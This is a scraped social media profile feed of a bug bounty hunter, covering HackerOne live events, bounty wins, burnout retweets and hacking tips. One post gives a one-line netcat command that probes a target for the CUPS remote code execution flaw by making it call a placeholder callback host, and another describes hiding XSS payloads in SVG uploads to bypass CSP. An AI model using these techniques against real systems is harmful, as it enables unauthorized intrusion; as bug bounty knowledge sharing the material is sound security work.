Stealthy Profile
Stealthy

@stealthybugs

Followers: 6K
Following: 1K
Media: 11
Statuses: 124

God is our refuge and strength, an ever-present help in trouble. - Psalm 46

California
Joined September 2019
@stealthybugs
Stealthy
1 month
I submitted my most critical bug yet on @Hacker0x01. Let's see how it goes!
3
0
89
@stealthybugs
Stealthy
2 months
RT @rez0__: You should sleep more. I know it’s cliche to talk about, but hear me out. I love staying up late, especially while hacking. B…
0
1
0
@stealthybugs
Stealthy
3 months
RT @cybersecmeg: me, when cybersecurity was the center of my life: exhausted, burnt-out, struggling to balance my friends and family, menta…
0
44
0
@stealthybugs
Stealthy
8 months
Just logged into Rocket League to see the white hat topper on my account. Still one of the coolest swag items from the Epic live event. #rocketleague #epicgames
0
0
30
@stealthybugs
Stealthy
8 months
What is your highest bounty for an informative report? This one is from last year's h1-305 LHE.
24
6
254
@stealthybugs
Stealthy
8 months
One day, the technique for exploiting this vulnerability will be available. Not today, but one day. Working with other bug hunters makes a huge difference. Two minds bouncing ideas off each other leads to peak efficiency.
81
103
1K
@stealthybugs
Stealthy
9 months
RT @ArchAngelDDay: How cool & chill is the #bugbounty community, when we enjoy helping each other out more than money?! fr fr. Thanks again…
0
1
0
@stealthybugs
Stealthy
9 months
Thought I'd share this remote code execution on one of the main sites for a large H1 target from a year ago. I found this one by being persistent and using Param Miner by @albinowax. After Param Miner discovered the header it was all manual testing to detect the template engine
15
92
738
@stealthybugs
Stealthy
9 months
Command line PoC to detect the Linux CUPS RCE. If a host is vulnerable, requests will hit your callback host.
echo -n "0 3 http://{yourcallback}:80/printers/whatever" | nc -u {target} 631
#rce #bugbounty #bugbountytips #hackerone #infosec #hacking #ethicalhacking #infosec
0
2
32
@stealthybugs
Stealthy
11 months
RT @jobertabma: nobody will remember:
- your bounty earnings
- how “busy you were”
- how many hours you worked
people will remember:
- y…
0
20
0
@stealthybugs
Stealthy
1 year
Attending H1-702 in Person again. Excited to see you all there. Favorite LHE location.
1
0
49
@stealthybugs
Stealthy
1 year
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600"
2
38
168
@stealthybugs
Stealthy
1 year
Submitted two catastrophic critical reports on two public @Hacker0x01 programs today. If all goes well I am considering partial disclosure on one of them once the report is resolved. #bugbounty #hackforgood
1
0
42
@stealthybugs
Stealthy
1 year
RT @RootMoksha: SSTI (Server Side Template Injection) Payload List. Credit: @Botami143. #bugbountytips #bugbounty
0
45
0
@stealthybugs
Stealthy
1 year
I am so happy and thankful to take home my first LHE trophy on @Hacker0x01. Executioner of #H1305 - most impactful report. I cannot disclose details but the bug is a cool one! Shout-out to all the friends I talked to and the new faces as well 💪😎 keep up the good work.
12
2
116